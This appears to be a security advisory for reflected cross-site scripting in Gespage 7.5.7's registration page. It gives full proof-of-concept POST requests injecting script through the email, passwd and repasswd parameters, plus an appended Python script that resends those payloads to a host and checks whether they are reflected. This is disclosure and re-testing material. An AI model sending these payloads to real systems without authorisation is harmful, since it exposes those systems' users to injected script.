Gespage is a web-based print management solution providing a printer portal. Official website: http://www.gespage.com/
The web application does not properly sanitise several parameters submitted by users, allowing script injection. These vulnerabilities let an attacker run arbitrary code, such as malicious JavaScript, in the browser of a user who submits a crafted request to the application.
Reflected cross-site scripting (XSS) vulnerabilities in version 7.5.7 of the Gespage software allow remote attackers to inject arbitrary web script or HTML via the email, passwd and repasswd parameters of webapp/users/user_reg.jsp.
Proof of Concept
From the registration page, malicious web code can be injected through the email, passwd and repasswd parameters; the value is reflected into the response without output encoding. The POST requests look like the following (blank fields are left empty, only the tested parameter carries the payload):
Email Parameter Reflected XSS HTTP Request:
POST /gespage/webapp/users/user_reg.jsp HTTP/1.1
Host: 172.16.219.191:7180
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59
Connection: close
Upgrade-Insecure-Requests: 1

New_User=New&username=&email=%3chtml+xmlns%3d%22http%3a%2f%2fwww.w3.org%2f1999%2fxhtml%22%3e%3cscript%3eprompt("Ahmet_Gurel_XSS")%3c%2fscript%3e%3c%2fhtml%3e&passwd=&repasswd=&fullname=&accept_term=accept&OK=Register
Passwd Parameter Reflected XSS HTTP Request:
POST /gespage/webapp/users/user_reg.jsp HTTP/1.1
Host: 172.16.219.191:7180
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59
Connection: close
Upgrade-Insecure-Requests: 1

New_User=New&username=&email=&passwd=%22+onmouseover%3dalert(document.domain)+%3d%22&repasswd=&fullname=&accept_term=accept&OK=Register
Repasswd Parameter Reflected XSS HTTP Request:
POST /gespage/webapp/users/user_reg.jsp HTTP/1.1
Host: 172.16.219.191:7180
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59
Connection: close
Upgrade-Insecure-Requests: 1

New_User=New&username=&email=&passwd=&repasswd=%22+onmouseover%3dalert(document.domain)+%3d%22&fullname=&accept_term=accept&OK=Register
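The three requests above differ only in which parameter carries the payload, so verifying a host (or re-testing it after a vendor fix) comes down to one loop: post the same form with the payload in each parameter and check whether the response reflects it verbatim, HTML-entity-encoded, or not at all. The script below is an added example and is not part of the advisory or of Gespage; it rebuilds the advisory's form body with the standard library and classifies the reflection. The response fragments it tests against are constructed for the example (they illustrate the `value="..."` attribute context the `" onmouseover=` payload implies; they are not captured Gespage output), and the `probe()` helper is an assumed convenience for hosts you are authorised to test.

```python
"""Reflection check for the Gespage user_reg.jsp XSS parameters.

Added example, not Gespage's code. Rebuilds the advisory's POST body and
classifies how a response reflects the payload.
"""
import html
import sys
import urllib.parse
import urllib.request

REG_PATH = "/gespage/webapp/users/user_reg.jsp"
PARAMS = ("email", "passwd", "repasswd")  # parameters named in the advisory

# Payloads decoded from the advisory's requests.
SCRIPT_PAYLOAD = ('<html xmlns="http://www.w3.org/1999/xhtml">'
                  '<script>prompt("Ahmet_Gurel_XSS")</script></html>')
ATTR_PAYLOAD = '" onmouseover=alert(document.domain) ="'


def build_form(param, payload):
    """Return the registration form the advisory posts, with payload in one field."""
    if param not in PARAMS:
        raise ValueError(f"unexpected parameter {param!r}")
    form = {"New_User": "New", "username": "", "email": "", "passwd": "",
            "repasswd": "", "fullname": "", "accept_term": "accept",
            "OK": "Register"}
    form[param] = payload
    return form


def encode_body(form):
    """application/x-www-form-urlencoded body, '+' for spaces like the advisory."""
    return urllib.parse.urlencode(form)


def decode_body(body):
    """Inverse of encode_body; keeps the blank fields the form sends."""
    return {k: v[0] for k, v in
            urllib.parse.parse_qs(body, keep_blank_values=True).items()}


def classify_reflection(body, payload):
    """'unescaped' = payload reaches the HTML parser intact (vulnerable);
    'escaped'     = only an entity-encoded copy is present (fixed);
    'partial'     = reflected but transformed in some other way, review by hand;
    'absent'      = not reflected."""
    if payload in body:
        return "unescaped"
    encoded_forms = (
        html.escape(payload, quote=True),                          # &quot; &lt; &gt;
        payload.replace('"', "&#34;").replace("<", "&lt;").replace(">", "&gt;"),
        payload.replace('"', "&#x22;").replace("<", "&lt;").replace(">", "&gt;"),
    )
    if any(form in body for form in encoded_forms):
        return "escaped"
    # Inert core: payload minus the characters that close an attribute or
    # open a tag. If only that survives, some transformation ran; a
    # backslash "fix" (value="\" onmouseover=...") lands here, and is still
    # exploitable because '\' means nothing inside an HTML attribute.
    core = payload.replace('"', "").replace("<", "").replace(">", "")
    return "partial" if core in body else "absent"


# Constructed response fragments for the example (not captured from Gespage).
VULNERABLE_HTML = ('<input type="password" name="passwd" value="'
                   + ATTR_PAYLOAD + '">')
FIXED_HTML = ('<input type="password" name="passwd" value="'
              + html.escape(ATTR_PAYLOAD, quote=True) + '">')
BACKSLASH_HTML = ('<input type="password" name="passwd" value="'
                  + ATTR_PAYLOAD.replace('"', '\\"') + '">')


def probe(base_url, param, payload, timeout=10):
    """Assumed helper: POST to a live host you are authorised to test."""
    data = encode_body(build_form(param, payload)).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + REG_PATH, data=data,
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify_reflection(resp.read().decode("utf-8", "replace"), payload)


if __name__ == "__main__":
    # Usage: python gespage_xss_check.py http://172.16.219.191:7180
    target = sys.argv[1]
    for name in PARAMS:
        payload = SCRIPT_PAYLOAD if name == "email" else ATTR_PAYLOAD
        print(f"{name:9s} {probe(target, name, payload)}")
```

Treat only "escaped" as evidence of a fix: "absent" may just mean the server rejected the request for another reason (missing session, validation error), and "partial" needs a look at the surrounding markup before concluding anything.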